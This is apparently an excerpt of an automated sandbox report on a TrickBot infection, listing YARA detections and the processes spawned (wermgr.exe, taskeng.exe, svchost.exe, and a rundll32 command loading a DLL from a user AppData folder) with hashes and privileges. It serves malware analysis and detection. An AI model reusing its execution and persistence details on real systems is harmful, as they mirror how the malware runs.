                                                                                                                                                                  • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2094284509.0000000000690000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2094761896.0000000002198000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  General

                                                                                                                                                                  Start time:02:03:43
                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                  Path:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                                                  Imagebase:0xffc90000
                                                                                                                                                                  File size:50688 bytes
                                                                                                                                                                  MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  General

                                                                                                                                                                  Start time:02:03:43
                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                  Path:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                                                  Imagebase:0xffc90000
                                                                                                                                                                  File size:50688 bytes
                                                                                                                                                                  MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  General

                                                                                                                                                                  Start time:02:05:29
                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                  Path:C:\Windows\System32\taskeng.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                                                                  Imagebase:0xfffe0000
                                                                                                                                                                  File size:464384 bytes
                                                                                                                                                                  MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  General

                                                                                                                                                                  Start time:02:05:29
                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor7737977537\rpBASEtx.rrd',DllRegisterServer
                                                                                                                                                                  Imagebase:0xff2c0000
                                                                                                                                                                  File size:45568 bytes
                                                                                                                                                                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  General

                                                                                                                                                                  Start time:02:05:36
                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                  Imagebase:0xff0e0000
                                                                                                                                                                  File size:27136 bytes
                                                                                                                                                                  MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  Disassembly

                                                                                                                                                                  Code Analysis

                                                                                                                                                                  Reset < >